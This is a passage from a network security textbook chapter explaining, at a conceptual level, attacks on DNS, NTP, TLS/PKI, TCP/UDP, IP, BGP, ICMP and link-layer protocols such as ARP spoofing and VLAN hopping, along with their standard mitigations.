typically chosen at random and are therefore not cached, hence sometimes referred to as
random subdomain attack. Consequently, the resolvers have to forward the lookups and hence
flood the target authoritative name server. In another type of DDoS attack, DNS servers (both
resolvers and authoritatives) are regularly abused for amplification DDoS attacks, in which
they reflect IP-spoofed DNS requests with significantly larger responses [1744]. Reducing the
number of publicly-reachable open DNS resolvers [1745] and DNS rate limiting can mitigate
these problems.
The Network Time Protocol (NTP) is used to synchronise devices (hosts, server, routers etc.)
to within a few milliseconds of Coordinated Universal Time (UTC). NTP clients request times
from NTP servers, taking into account round-trip times of this communication. In principle,
NTP servers use a hierarchical security model implementing digital signatures and other
standard application-layer security mechanisms to prevent transport-layer attacks such as
replay or PITM. However, these security mechanisms are rarely enforced, easing attacks that
shift the time of target system [1746] in both, on-path and off-path attacks. In fact, such time
shifting attacks may have severe consequences, as they, e.g., allow attackers to use outdated
certificates or force cache flushes. The large number of NTP clients that rely on just a few
NTP servers on the Internet to obtain their time are especially prone to this attack [1747]. To
counter this threat, network operators should install local NTP servers that use and compare
multiple trusted NTP server peers. Alternatively, hosts can use NTP client implementations
that offer provably secure time crowdsourcing algorithms [1748].
There are two main threats to DHTs: (i) Eclipse and (ii) Sybil attacks. An Eclipse attacker aims
to poison routing tables to isolate target nodes from other, benign overlay peers. Redundancy
helps best against Eclipse attacks. For example, systems like Kademlia foresee storage and
routing redundancy, which mitigate some low-profile attacks against DHTs. In the extreme,
DHT implementations can use dedicated routing tables with verified entries [1749]. Central
authorities—which lower the degree of distribution of DHTs, though—can solve the underlying
root problem and assign stable node identifiers [1088].
In a Sybil attack, an adversary introduces malicious nodes with self-chosen identifiers to
subvert DHT protocol redundancy [1084]. To prevent such Sybils, one can limit the number
of nodes per entity, e.g., based on IP addresses [1749]—yet causing collateral damage to
nodes sharing this entity (e.g., multiple peers behind a NAT gateway). Others suggested to
use peer location as identifier validation mechanisms, which, however, prevents that nodes
can relocate [1750]. Computational puzzles can slow down the pace at which attackers can
inject malicious peers [1751], but are ineffective against distributed botnet attacks. Finally,
reputation systems enable peers to learn trust profiles of their neighbors [1752], which ideally
discredit malicious nodes [1752].
Unfortunately, all these countermeasures either restrict the generality of DHTs, or introduce a
centralized component. Therefore, most defenses have not fully evolved from academia
into practice. A more complete treatment of DHT security is provided by Urdaneta and
van Steen [1088] and in the Distributed Systems Security Knowledge Area (Chapter 12).
by Tor clients that know the server identity (a hash over their public key). As onion services
receive data via Tor circuits and can never be contacted directly, their identity remains hidden.
While Tor gives strong anonymity guarantees, it is not fully immune against deanonymisation.
In particular, traffic analysis and active traffic delay may help to infer the communication
partners, especially if entry and exit node collaborate. In fact, it is widely accepted that power-
ful adversaries can link communication partners by correlating traffic entering and leaving
the Tor network [515, 1754]. Furthermore, patterns such as inter-arrival times or cumulative
packet sizes were found sufficient to attribute encrypted communication to a particular web-
site [1755]. Consequently, attackers may be able to predict parts of the communication content
even though communication is encrypted and padded. As a response, researchers explored
countermeasures such as constant rate sending or more efficient variants of it [1756].
Orthogonal to ACNs, censorship-resistant networks aim to prevent that attackers can suppress
communication. The typical methodology here is to blend blocklisted communication into
allowed traffic. For example, decoy routing uses on-path routers to extract covert (blocklisted)
information from an overt (allowed) channel and redirects this hidden traffic to the true
destination [581]. Similarly, domain fronting leverages allowed TLS endpoints to forward a
covert stream—hidden in an allowed TLS stream—to the actual endpoint [578]. Having said
this, nation state adversaries have the power to turn off major parts (or even all) of the
communication to radically subvert these schemes at the expense of large collateral damage.
Application-layer protocols rely on the transport layer to provide confidentiality, integrity and
authentication mechanisms. These capabilities are provided by a shim layer between the
application and transport layers, called the Transport Layer Security (TLS). In this section,
our discussions will be hugely simplified to just cover the basics of the TLS protocol. For a
more detailed discussion, including the history of TLS and past vulnerabilities, see Applied
Cryptography Knowledge Area (Section 18.5).
We discuss the most recent and popular TLS versions 1.2 and 1.3, with a particular focus
on their handshakes. Irrespective of the TLS version, the handshake takes care of crypto-
graphic details that application-layer protocols otherwise would have to deal with themselves:
authenticating each other, agreeing on cryptographic cipher suites, and deriving key material.
The handshakes differ between the two TLS versions, as shown in Figure 19.2. We start
discussing TLS 1.2, as shown on the left-hand side of the figure. First, client and server
negotiate which TLS version and cipher suites to use in order to guarantee compatibility
even among heterogeneous communication partners. Second, server and client exchange
certificates to authenticate each other, whereas client authentication is optional (and for
brevity, omitted in Figure 19.2). Certificates contain communication partner identifiers such
as domain names for web servers, and include their vetted public keys (see Section 19.3.2.2
for details). Third, the communication partners derive a symmetric key that can be used to
Internet Internet
TLS
Hand-
shake
Figure 19.2: TLS Handshake: Comparison between TLS 1.2 (on the left) and TLS 1.3 (on the
right), excluding the optional steps for client authentication.
secure the data transfer. To derive a key, the client can encrypt a freshly generated symmetric
key under the server’s public (e.g., RSA) key. Alternatively, the partners can derive a key using
a Diffie-Hellman Key Exchange (DHKE). The DHKE provides TLS with perfect forward secrecy
that prevents attackers from decrypting communication even if the server’s private key leaks.
As a final step, the handshake then validates the integrity of the handshake session. From now
on, as part of the data transfer phase, TLS partners use the derived key material to encrypt
and authenticate the subsequent communication.
TLS 1.3, as shown on the right of Figure 19.2, designs this handshake more efficiently. Without
sacrificing security guarantees, TLS 1.3 reduces the number of round-trip times to one (1-
RTT). TLS 1.3 no longer supports RSA-based key exchanges in favor of DHKE. The client
therefore guesses the chosen key agreement protocol (e.g., DHKE) and sends its key share
right away in the first step. The server would then respond with the chosen protocol, its
key share, certificate and a signature over the handshake (in a CertificateVerify message). If
the client was connected to the server before, TLS 1.3 even supports a handshake without
additional round-trip time (0-RTT)—at the expense of weakening forward secrecy and replay
prevention. Finally, as Formal Methods for Security Knowledge Area (Chapter 13) explores,
TLS 1.3 has the additional benefit that it is formally verified to be secure [1719, 1757].
We now briefly discuss how TLS successfully secures against common network attacks.
First, consider an eavesdropper that wants to obtain secrets from captured TLS-protected
traffic. As the user data is encrypted, no secrets can be inferred. Second, in an IP spoofing
attack, attackers may try any of the TLS partners to accept bogus data. However, to inject data,
attackers lack the secret key to inject encrypted content. Third, also data cannot be altered, as
TLS protects data integrity using authenticated encryption or message authentication codes.
Finally, even a strong PITM attack is prevented by the help of certificates that authenticate
the parties—unless the PITM attacker can issue certificates that the TLS partners trust, as
discussed next. The TLS protocol also guarantees that payload arrives at the application in
order, detects dropped and modified content, and also effectively prevents replay attacks that
resend the same encrypted traffic to duplicate payload. Having said this, TLS does not prevent
attackers from delaying parts or all of the communication.
So far we have simply assumed that communication partners can reliably obtain trustworthy
public keys from each other. However, in presence of active on-path attackers, how can one
trust public keys exchanged via an insecure channel? The fundamental “problem” is that,
conceptually, everyone can create public/private key pairs. Public-Key Infrastructure (PKI)
provides a solution for managing trustworthy public keys (and, implicitly, their private key
counterparts). Government agencies or standard organisations appoint registrars who issue
and keep track of so-called certificates on behalf of entities (individuals, servers, routers etc).
Assume a user wants to obtain a trusted certificate and the corresponding key material.
To this end, the user first generates a public/private key pair on their own hardware. The
private key is never shared with anyone. The public key becomes part of a certificate signing
request (CSR) that the user sends to a registration authority. Before this authority signs the
certificate as requested, the user has to prove their identity (e.g., possession of a domain
name for an HTTPS certificate, or personal identifiers for an S/MIME certificate) to registrars.
The registrar’s signature prevents forgery, as anyone can now verify the certificate using the
(publicly known or similarly verifiable) registrar’s public key. The resulting certificate contains
the user’s identity and public key, as well as CA information and a period of certificate validity.
Its format and PKI management specifications are specified in RFC 1422 and the ITU-X.509
standard.
The existing PKI model has faced several challenges, as evidenced by cases where CAs
have issued certificates in error, or under coercion, or through their own infrastructure being
attacked. As a response, CAs publish a list of revoked/withdrawn certificates, which can be
queried using the Online Certificate Status Protocol (OCSP) as defined in RFC 6960, or is
piggy-backed (“stapled”) in TLS handshakes. To avoid wrong (but validated) certificates being
issued, browsers temporarily started “pinning” them. However, this practice that was quickly
abandoned and deprecated in major browsers, as it turned out to be prone to human errors
(in case of key theft or key loss). Instead, big players such as Google or Cloudflare started
collecting any observed and valid certificates in public immutable logs. TLS client such as
browsers can then opt to refuse non-logged certificates. This scheme, known as Certificate
Transparency (CT) [1758], forces attackers publishing their rogue certificates. Consequently,
certificate owners can notice whether malicious parties started abusing their identifies (e.g.,
domains).
The web of trust is an alternative, decentralized PKI scheme where users can create a com-
munity of trusted parties by mutually signing certificates without needing a registrar. The
PGP scheme we discussed in Section 19.3.1.1 and its prominent implementation GNU Privacy
Guard (GPG) is a good example, in which users certify each others’ key authenticity.
A more detailed PKI discussion is part of the Applied Cryptography Knowledge Area (Sec-
tion 18.3.8).
TLS does a great deal in protecting the TCP payloads and prevents session hijacks and packet
injection. Yet what about the security of TCP headers of TLS connections or other, non-TLS
connections? In fact, attackers could try launching TCP reset attacks that aim to maliciously
tear down a target TCP connection. To this end, they guess or bruteforce valid sequence
numbers, and then spoof TCP segments with the RST flag being set. If the spoofed sequence
numbers hit the sliding window, the receiving party will terminate the connection. There are
mainly two orthogonal solutions to this problem deployed in practice: (i) TCP/IP stacks have to
ensure strong randomness for (initial) sequence number generation. (ii) Deny RST segments
with sequence numbers that fall in the middle of the sliding window. Conceptually, these
defenses are ineffective against on-path attackers that can reliably manipulate TCP segments
(e.g., dropping payload and setting the RST flag). Having said this, Weaver et al. [1759] show
that race conditions allow for detecting RST attacks launched by off-path attackers even if
they can infer the correct sequence number.
A SYN Flooding attacker keeps sending TCP SYN segments and forces a server to allocate
resources for half-opened TCP connections. When servers limit the number of half-opened
connections, benign clients can no longer establish TCP connections to the server. To mitigate
this session exhaustion, servers can delete a random half-opened session whenever a new
session needs to be created—potentially deleting benign sessions, though. A defence known
as SYN Cookies has been implemented by operating systems as a more systematic response
to SYN floods [RFC4987]. When enabled, the server does not half open a connection right
away on receiving a TCP connection request. It selects an Initial Sequence Number (ISN)
using a hash function over source and destination IP addresses, port numbers of the SYN
segment, a timestamp with a resolution of 64 seconds, as well as a secret number only known
to the server. The server then sends the client this ISN in the SYN/ACK message. If the request
is from a legitimate sender, the server receives an ACK message with an acknowledgment
number which is ISN plus 1. To verify if an ACK is from a benign sender, the server thus again
computes the SYN cookie using the above-mentioned data, and checks if the acknowledge
number in the ACK segment minus one corresponds to the SYN cookie. If so, the server opens
a TCP connection, and only then starts using resources. A DoS attacker would have to waste
resources themselves and reveal the true sending IP address to learn the correct ISN, hence,
leveling the fairness of resource consumption.
What TLS is for TCP, Datagram TLS (DTLS) is for UDP. Yet again there are additional security
considerations for UDP that we briefly discuss next. In contrast to its big brother TCP, UDP is
designed such that application-layer protocols have to handle key mechanisms themselves
(or tolerate their absence), including reordering, reliable transport, or identifier recognition.
Furthermore, being a connection-less protocol, UDP endpoints do not implicitly verify each
others’ IP address before communication starts. Consequently, if not handled at the appli-
cation layer, UDP protocols are prone to IP spoofing attacks. We already showcased the
consequences of this at the example of DNS spoofing. In general, to protect against this threat,
any UDP-based application protocol must gauge the security impact of IP spoofing.
Reflective DDoS attacks are a particular subclass of IP spoofing attacks. Here, attackers send
IP packets in which the source IP address corresponds to a DDoS target. If the immediate
recipients (called reflectors) reply to such packets, their answers overload the victim with
undesired replies. We mentioned this threat already in the context of DNS (Section 19.3.1.3).
The general vulnerability boils down to the lack of IP address validation in UDP. Consequently,
several other UDP-based protocols are similarly vulnerable to reflection [1744]. Reflection
attacks turn into amplification attacks, if the responses are significantly larger than the
requests, which effectively amplifies the attack bandwidth. Unless application-level protocols
validate addresses, or enforce authentication, reflection for UDP-based protocols will remain
possible. If protocol changes would break compatibility, implementations are advised to
rate limit the frequency in which clients can trigger high-amplification responses. Alternative,
non-mandatory instances of amplifying services can be taken offline [1745].
19.3.2.5 QUIC
QUIC is a new transport-level protocol that saw rapid deployment by popular Web browsers.
QUIC offers faster communication using UDP instead of HTTP over TCP. QUIC was originally
designed by Google, and was then standardized by the IETF in 2021 [1760]. Its main goal is
increasing communication performance using multiplexed connections. Being a relatively
new protocol, in contrast to other protocols, QUIC was designed to be secure. Technically,
QUIC uses most of the concepts described in TLS 1.3, but replaces the TLS Record Layer with
its own format. This way, QUIC cannot only encrypt payload, but also most of the header data.
QUIC, being UDP-based, “replaces” the TCP three-way handshake by its own handshake, which
integrates the TLS handshake. This eliminates any round-trip time overhead of TLS. With
reference to Figure 19.2 (page 657), QUIC integrates the only two TLS 1.3 handshake messages
in its own handshake. When serving certificates and additional data during the handshake,
QUIC servers run the risk of being abused for amplification attacks (cf. Section 19.3.2.4), as
server responses are significantly larger than initial client requests. To mitigate this problem,
QUIC servers verify addresses during the handshake, and must not exceed certain amplification
prior to verifying addresses (the current IETF standard draft defines a factor of three).
IP Spoofing: IP spoofing, as discussed for UDP and DNS (sections 19.3.2.4 and 19.3.1.3,
respectively), finds its root in the Internet Protocol (IP) and affects both IPv4 and IPv6. In
principle, malicious clients can freely choose to send traffic with any arbitrary IP address.
Thankfully, most providers perform egress filtering and discard traffic from IP addresses
outside of their domain [1761]. Furthermore, Unicast Reverse Path Forwarding (uRPF) enables
on-path routers to drop traffic from IP addresses that they would have expected entering on
other interfaces [1761].
Fragmentation Attacks: IPv4 has to fragment packets that do not fit the network’s Maximum
Transmission Unit (MTU). While fragmentation is trivial, defragmentation is not so, and has
led to severe security problems in the past. For example, a Teardrop attack abuses the fact
that operating systems may try to retain huge amounts of payload when trying to reassemble
highly-overlapping fragments of a synthetic TCP segment. Fragmentation also eases DNS
cache poisoning attacks in that attackers need to bruteforce a reduced search space by
attacking only the non-starting fragments [1762]. Finally, fragmentation may assist attackers
in evading simple payload matches by scattering payload over multiple fragments.
VPNs and IPsec: Many organisations prefer their traffic to be fully encrypted as it leaves
their network. For example, they may want to connect several islands of private networks
owned by an organisation via the Internet. Also, employers and employees want a flexible work
environment where people can work from home, or connect from a hotel room or an airport
lounge without compromising their security. If only individual, otherwise-internal web hosts
need to made available, administrators can deploy web proxies that tunnel traffic (sometimes
referred to as WebVPN). In contrast, a full-fledged Virtual Private Network (VPN) connects
two or more otherwise-separated networks, and not just individual hosts.
There are plenty of security protocols that enable for VPNs, such as Point-to-Point Tunneling
Protocol (PPTP) (deprecated), TLS (used by, e.g., OpenVPN [1763]), or Secure Socket Tunneling
Protocol (SSTP). We will illustrate the general VPN concept at the example of the Internet
Protocol Security (IPsec) protocol suite. Figure 19.4 shows that an employee working from
home accesses a server at work, the VPN client in their host encapsulates IPv4 datagrams into
IPsec and encrypts IPv4 payload containing TCP or UDP segments, or other control messages.
The corporate gateway detects the IPsec datagram, decrypts it and decapsulates it back
to the IPv4 datagram before forwarding it to the server. Every response from the server is
also encrypted by the gateway. IPsec also provides data integrity, origin authentication and
replay attack prevention. These guarantees depend on the chosen IPSec protocol, though.
Only the recommended and widely-deployed Encapsulation Security Payload (ESP) protocol
(part of IPSec) provides these guarantees, including confidentiality and origin authentication.
In contrast, the less popular Authentication Header (AH) protocol just provides integrity.
Similarly, several tunneling protocols such as Generic Routing Encapsulation (GRE), Layer
2 Tunneling Protocol (L2TP) or Multiprotocol Label Switching (MPLS) do not provide CIA
guarantees. Should those be required in untrusted networks, e.g., due to GRE’s multi-protocol
or multi-casting functionality, it is advisable to use them in combination with IPSec.
The entire set of modes/configurations/standards provided by IPsec is extensive [1764].
Here, we only briefly introduce that IPsec supports two modes of operation: tunnel mode
and transport mode, as compared in Figure 19.3. In transport mode, only the IP payload—not
the original IP header—is protected. The tunnel mode represent a viable alternative if the
edge devices (routers/gateways) of two networks are IPsec aware. Then, the rest of the
servers/hosts need not worry about IPsec. The edge devices encapsulate every IP packet
in IPsec: IP header IPsec hdr IP data new IP hdr IPsec hdr IP header IP payload
Figure 19.3: Comparison between IPsec transport mode and tunnel mode. All parts of the
original packets that are shaded in gray are protected in the respective mode.
IP TCP/UDP Data
Header Header Payload
Public
Internet IP IPSec TCP/UDP Data Payload
Header Header Header
IPSec compliant
Encrypted
Gateway Router
Enterprise Network
IP IPSec TCP/UDP Data Payload
Header Header Header
Encrypted
IPSec Compliant
Host
Home Network
Figure 19.4: IPsec client-server interaction in transport mode (no protection of IP headers).
including the header. This virtually creates a secure tunnel between the two edge devices. The
receiving edge device then decapsulates the IPv4 datagram and forwards within its network
using standard IP forwarding. Tunnel mode simplifies key negotiation, as two edge devices
can handle connections on behalf of all hosts in their respective networks. An additional
advantage is that also IP headers (including source/destination address) gets encrypted.
When a large number of endpoints use IPsec, manually distributing the IPsec keys becomes
challenging. RFC 7296 [1765] defines the Internet Key Exchange protocol (IKEv2). Readers
will observe a similarity between TLS (Section 19.3.2) and IKE, in that IKE also requires an
initial handshake process to negotiate cryptographic algorithms and other values such as
nonces and exhange identities and certificates. We will skip the details of a complex two-
phase protocol exchange which results in the establishment of a quantity called SKEYSEED.
These SKEYSEEDs are used to generate the keys used during a session (Security Associa-
tions (SAs)). IKEv2 uses the Internet Security Association and Key Management Protocol
(ISAKMP) [1766], which defines the procedures for authenticating the communicating peer,
creation and management of SAs, and the key generation techniques.
NAT: Due to the shortage of IPv4 address space, Network Address Translation (NAT) was
designed so that private IP addresses could be mapped onto an externally routable IP address
by the NAT device [1731]. For an outgoing IP packet, the NAT device changes the private source
IP address to a public IP address of the outgoing link. This has implicit, yet unintentional
security benefits. First, NAT obfuscates the internal IP address from the outside world. To a
potential attacker, the packets appear to be coming from the NAT device, not the real host
behind the NAT device. Second, unless loopholes are opened via port forwarding or via UPnP,
NAT gateways such as home routers prevent attackers from reaching internal hosts.
Although conceptually very similar from a security perspective, IPv6 brings a few advantages
over IPv4. For example, IPv6’s 128-bit address space slows down port scans, as opposed
to IPv4, where the entire 32-bit address space can be scanned in less than an hour [1767].
Similarly, IPv6 comes with built-in encryption in form of IPsec. IPsec that was initially mandated
in the early IPv6 standard. Yet nowadays, due to implementation difficulties, IPsec remains a
recommendation only. Furthermore, in contrast to IPv4, IPv6 has no options in its header—
these were used for attacks/exploits in IPv4.
The community has debated many years over the potential security pitfalls with IPv6. As a
quite drastic change, the huge address space in IPv6 obsoletes NATing within the IPv6 world,
including all its implicit security benefits. In particular, NAT requires state tracking, which
devices often couple with a stateful firewall (which we will discuss in Section 19.4.1) that brings
additional security. Furthermore, NAT hides the true IP addresses and therefore complicates IP-
based tracking—providing some weak form of anonymity. Having said this, experts argue that
these perceived advantages also come with lots of complexity and disadvantages (e.g., single
point of failure), and that eliminating NAT by no means implies that Internet-connected devices
no longer have firewalls [1768]. Furthermore, having large networks to choose addresses from,
IPv6 may allow to rotate IP addresses more frequently to complicate address-based tracking.
Summarizing this debate, as long as we do not drop firewalls, and are careful with IP address
assignment policies, IPv6 does not weaken security.
Finally, another important aspect to consider is that we are still in a steady transition from IPv4
to IPv6. Hence, many devices feature a so-called dual stack, i.e., IPv4 and IPv6 connectivity.
This naturally asks for protecting both network accesses simultaneously.
IPv4/IPv6 assume that Internet routers reliably forward packets from source to destination.
Unfortunately, a network can easily be disrupted if either the routers themselves are compro-
mised or they accept spurious routing exchange messages from malicious actors. We will
discuss these threats in the following, distinguishing between internal and external routing.
Within an Autonomous System (AS): Interior Gateway Protocols (IGPs) are used for exchang-
ing routing information within an Autonomous System (AS). Two such protocols, Routing
Information Protocol (RIPv2) and Open Shortest Path First (OSPFv2), are in widespread use
with ASs for IPv4 networks. The newer RIPng and OSPFv3 versions support IPv6. These
protocols support no security by default but can be configured to support either plain text-
based authentication or MD5-based authentication. Authentication can avoid several kinds
of attacks such as bogus route insertion or modifying and adding a rogue neighbour. Older
routing protocols, including RIPv1 or Cisco’s proprietary Interior Gateway Routing Protocol
(IGRP)—unlike its more secure successor, the Enhanced Interior Gateway Routing Protocol
(EIGRP)—do not offer any kind of authentication, and hence, should be used with care.
Across ASs: The Internet uses a hierarchical system where each AS exchanges routing infor-
mation with other ASs using the Border Gateway Protocol (BGP) [1769, 1770]. BGP is a path
vector routing protocol. We distinguish between External BGP used across ASs, and Internal
BGP that is used to propagate routes within an AS. From now on, when referring to BGP, we
talk about External BGP, as it comes with the most interesting security challenges. In BGP, ASs
advertise their IP prefixes (IP address ranges of size /24 or larger) to peers, upstreams and
customers [1731]. BGP routers append their AS information before forwarding these prefixes
to their neighbors. Effectively, this creates a list of ASs that have to be passed to reach the
prefix, commonly referred to as the AS path.
High-impact attacks in the past have highlighted the security weakness in BGP due to its
lack of integrity and authentication [1771]. In particular, in a BGP prefix hijacking attack [1772],
a malicious router could advertise an IP prefix, saying that the best route to a service is
through its network. Once the traffic starts to flow through its network, it can drop (DoS,
censorship), sniff on (eavesdrop) or redirect traffic in order to overload an unsuspecting AS.
As a countermeasure, the Resource Public Key Infrastructure (RPKI) [1773], as operated by
the five Regional Internet Registrys (RIRs), maps IP prefixes to ASs in so-called Route Origin
Authorization (ROA). When neighbors receive announcements, RPKI allows them to discard
BGP announcements that are not backed by an ROA or are more specific than allowed by the
ROA. This process, called Route Origin Validation (ROV), enables to drop advertisements in
which the AS that owns the advertised prefix is not on the advertised path.
RPKI cannot detect bogus advertisements where the owning AS is on path, but a malicious
AS aims to reroute the target’s AS traffic as an intermediary. BGPsec partially addresses this
remaining security concern [1774]. Two neighbouring routers can use IPsec mechanisms for
point-to-point security to exchange updates. Furthermore, BGPsec enables routers to verify
the incremental updates of an announced AS path. That is, they can verify which on-path
AS has added itself to the AS path, preventing bogus paths that include a malicious AS that
lacks the according cryptographic secrets. However, BGPsec entails large overheads, such
as verifying a larger number of signatures on booting, and splitting up bulk announcements
into many smaller ones. Furthermore, BGPsec only adds security if all systems on the AS
path support it. Hence, not many routers deploy BGPsec yet, fueled by the lack of short-term
benefits [1775]—and it is likely to take years until it will find wide adoption, if ever.
Despite the fact that BGP prefix hijacks are a decade-old problem, fixing them retroactively
remains one of the great unsolved challenges in network security. In fact, one camp argues
that the BGP design is inherently flawed [1776], and entire (yet not widely deployed) Internet
redesigns such as SCION [1777] indeed provide much stronger guarantees. Others did not give
up yet, and hope to further strengthen the trust in AS paths by the help of ongoing initiatives
such as Autonomous System Provider Authorization (ASPA) [1778].
Internet Control Message Protocol (ICMP) is a supportive protocol mainly used for exchanging
status or error information. Unfortunately, it introduced several orthogonal security risks,
most of which are no longer present but still worth mentioning. Most notably, there many
documented cases in which ICMP was an enabler for Denial of Service (DoS) attacks. The Ping
of Death abused a malformed ICMP packet that triggered a software bug in earlier versions
of the Windows operating system, typically leading to a system crash at the packet recipient.
In an ICMP flood, an attacker sends massive amounts of ICMP packets to swamp a target
network/system. Such floods can be further amplified in so-called smurf attacks, in which an
attacker sends IP-spoofed ICMP ping messages to the broadcast address of an IP network.
If the ICMP messages are relayed to all network participants using the (spoofed) address
of the target system as source, the target receives ping responses from all active devices.
Smurf attacks can be mitigated by dropping ICMP packets from outside of the network, or by
dropping ICMP messages destined to broadcast addresses.
But also outside of the DoS context, ICMP is worth considering from a security perspective.
Insider attackers can abuse ICMP as covert channel to leak sensitive data unless ICMP is
closely monitored or forbidden. ICMP reachability tests allow attackers to perform network
reconnaissance during network scans (see also Section 19.4.3). Many network operators
thus balance pros and cons of ICMP in their networks, often deciding to drop external ICMP
messages using a firewall (see also Section 19.4.1).
The IEEE 802.1X is a port-based authentication for securing both wired and wireless networks.
Before a user can access a network at the link layer, it must authenticate the switch or access
point (AP) they are attempting to connect to, either physically or via a wireless channel. As with
most standards bodies, this group has its own jargon. Figure 19.5 shows a typical 802.1X setup.
A user is called a supplicant and a switch or AP is called an authenticator. Supplicant software
is typically available on various OS platforms or it can also be provided by chipset vendors.
A supplicant (client) wishing to access a network must use the Extensible Authentication
Protocol (EAP) to connect to the Authentication Server (AuthS) via an authenticator. The EAP
is an end-to-end (client to authentication server) protocol. When a new client (supplicant)
is connected to an authenticator, the port on the authenticator is set to the ‘unauthorised’
state, allowing only 802.1X traffic. Other higher layer traffic, such as TCP/UDP is blocked. The
authenticator sends out the EAP-Request identity to the supplicant. The supplicant responds
with the EAP-response packet, which is forwarded to the AS, and typically proves the supplicant
possesses its credentials. After successful verification, the authenticator unblocks the port to
let higher layer traffic through. When the supplicant logs off, the EAP-logoff to the authenticator
sets the port to block all non-EAP traffic.
EAP TLS
EAP
Hub
Wired LAN
Wireless Device
Supplicant
There are a couple of pitfalls when deploying EAP and choosing the wrong mode of operation.
Certain EAP modes are prone to PITM attacks, especially in a wireless setting. It therefore is
advised to use any sort of TLS-based EAP variant, such as EAP-TLS [1779] or the Protected Ex-
tensible Authentication Protocol (PEAP). Similarly, dictionary attacks can weaken the security
guarantees of certain EAP modes (e.g., EAP-MD5) that should be avoided.
What IEEE 802.1X is for local networks, protocols like Point-to-Point Protocol (PPP), its sibling
PPP over Ethernet (PPPoE), or High-Level Data Link Control (HDLC) are for Wide Area Networks
(WANs). They offer clients means to connect to the Internet by the help of their ISPs. PPP(oE) is
the most widely used protocol in this context, used by billions of broadcast devices worldwide.
Although optional in its standard, in practice, ISPs usually mandate client authentication to
hold unauthorized users off. Popular examples of such authentication protocols within PPP
are Password Authentication Protocol (PAP), Challenge Handshake Authentication Protocol
(CHAP), or any of the authentication protocols supported by EAP. Usage of PAP is discouraged,
as it transmits client credentials in plain. Instead, CHAP uses a reasonbly secure challenge-
response authentication, which is however susceptible to offline bruteforce attacks against
recorded authentication sessions that contain weak credentials.
Ethernet switches maintain forwarding table entries in a Content Addressable Memory (CAM).
As a switch learns about a new destination host, the switch includes this host’s address and
its physical port in the CAM. For all future communications, this table entry is looked up to
forward a frame to the correct physical port. MAC spoofing allow attackers to manipulate this
mapping by forging their Message Authentication Code (MAC) addresses when sending traffic.
For example, to poison the forwarding table, an attacker crafts frames with random addresses
to populate an entire CAM. If successful, switches have to flood all the incoming data frames
to all the outgoing ports, as they can no longer enter new address-to-port mappings. This
makes the data available to the attacker attached to any of the switch ports.
Such MAC spoofing attacks can also be more targeted. Assume attackers want to steal traffic
destined to one particular target host only, instead of seeing all traffic. The attacker then
copies the target’s MAC address. This way, the attacker may implicitly rewrite the target’s entry
in the switch forwarding table. If so, the switch will falsely forward frames to the attacking
host that were actually destined for the target host.
Mitigating these MAC spoofing attacks requires authenticating the MAC addresses before
populating the forwarding table entry. For example, IEEE 802.1X (see Section 19.3.4.1) mitigates
such attack, vetting hosts before they can connect. Furthermore, switches may limit the
number of MAC addresses per interface or enforce MAC bindings, as described next.
The Address Resolution Protocol (ARP) translates IPv4 addresses to link layer addresses
(e.g., MAC addresses in Ethernet). ARP spoofing is similar to MAC spoofing, yet does not
(only) target the switch’s address mappings. Instead, ARP spoofing target the IP-to-MAC
address mappings of all network participants (possibly including the switch) in the same
segment. To this end, ARP spoofing attackers send fake ARP messages over a LAN. For
example, they can broadcast crafted ARP requests and hope participants learn wrong IP-to-
MAC mappings on the fly, or reply with forged replies to ARP request. Either way, attackers
aim to (re-)bind the target’s IP address to their own MAC address. If successful, attackers
will receive data that were intended for the target’s IP address. ARP spoofing is particularly
popular for session hijacking and PITM attacks. Similar attacks are possible for the Reverse
Address Resolution Protocol (RARP), which—by now rarely used—allows hosts to discover
their IP address. To mitigate ARP spoofing, switches employ (or learn) a trusted database of
static IP-to-MAC address mappings, and refuse to relay any ARP traffic that contradicts these
trusted entries. Alternatively, network administrators can spot ARP anomalies [1780], e.g.,
searching for suspicious cases in which one IP address maps to multiple MAC addresses.
What ARP is for IPv4, the Neighbor Discovery Protocol (NDP) is for IPv6. NDP is based on
ICMPv6 and is more feature-rich than ARP. Conceptually, NDP underlies the same spoofing
risks as ARP, though, and requires the same countermeasures. Furthermore, there is one
more caveat due to automatic IPv6 address assignment. In IPv6’s most basic (yet common)
IP address autoconfiguration scheme, layer-3 addresses are derived directly from layer-2
addresses without any need for address resolution. Knowledge of the MAC address may allow
attackers to infer information about the host/servers which can be handy when launching
attacks, or to track devices even if they change network prefixes. Using hash function for
address generation is recommended as a mitigation technique. Further, RFC 4982 extends
IPv6 by allowing for a Cryptographically Generated Address (CGA) where an address is bound
to a public signature key. Orthogonal to this, RFC 7217 proposes to have stable addresses
within a network prefix, and change them when clients switch networks to avoid cross-network
tracking.
MAC spoofing and ARP spoofing nicely illustrate how fragile security on the network layer
is. Consequently, network architects aim to split their physical network into several smaller
networks—a practice known as network segmentation. Highly-critical environments such as
sensitive military or control networks use physical segmentation. As the required change
of cables and wires is quite expensive, virtual network segmentation has become a popular
alternative. Virtual LANs (VLANs) are the de facto standard for virtual segmentation on
Ethernet networks. VLANs can split sensitive (e.g., internal servers) from less sensitive (guest
WiFi) network segments. VLANs enforce that routers can see and react upon traffic between
segments, and limit the harm attackers can do to the entire LAN. It is important to note that
network segmentation (e.g., via VLANs) does not necessarily require VPNs to bridge the
networks. If all network segments are local, a router that is part of multiple subnetworks can
connect them, ideally augmented with secure firewall policies (cf. Section 19.4.1) that control
inter-network communication at the IP layer.
VLAN hopping attacks allow an attacking host on a VLAN to gain access to resources on
other VLANs that would normally be restricted. There are two primary methods of VLAN
hopping: switch spoofing and double tagging. In a switch spoofing attack, an attacking host
impersonates a trunking switch responding to the tagging and trunking protocols (e.g., IEEE
802.1Q or Dynamic Trunking Protocol) typically used in a VLAN environment. The attacker
now succeeds in accessing traffic for multiple VLANs. Vendors mitigate these attacks by
proper switch configuration. For example, the ports are assigned a trunking role explicitly and
the others are configured as access ports only. Also, any automatic trunk negotiation protocol
can be disabled. In a double tagging attack, an attacker succeeds in sending its frame to more
than one VLAN by inserting two VLAN tags to a frame it transmits. However, this attack does
not allow them to receive a response. Again, vendors provide recommended configuration
methods to deal with these possible attacks. A comprehensive survey of Ethernet attacks
and defence can be found in [1781].
Organizations like hosting providers that heavily virtualize services quickly reach the limitation
of having a maximum of little less than 4096 VLANs when trying to isolating their services.
Virtual eXtensible LAN (VXLAN) tackles this limitation by introducing an encapsulation scheme
for multi-tenant environments [1782]. Unlike VLANs, which work on the link layer, VXLANs
strictly speaking operate at the network layer to emulate link-layer networks. VXLAN allows
creating up to ≈16M virtually separated networks, which can additionally be combined with
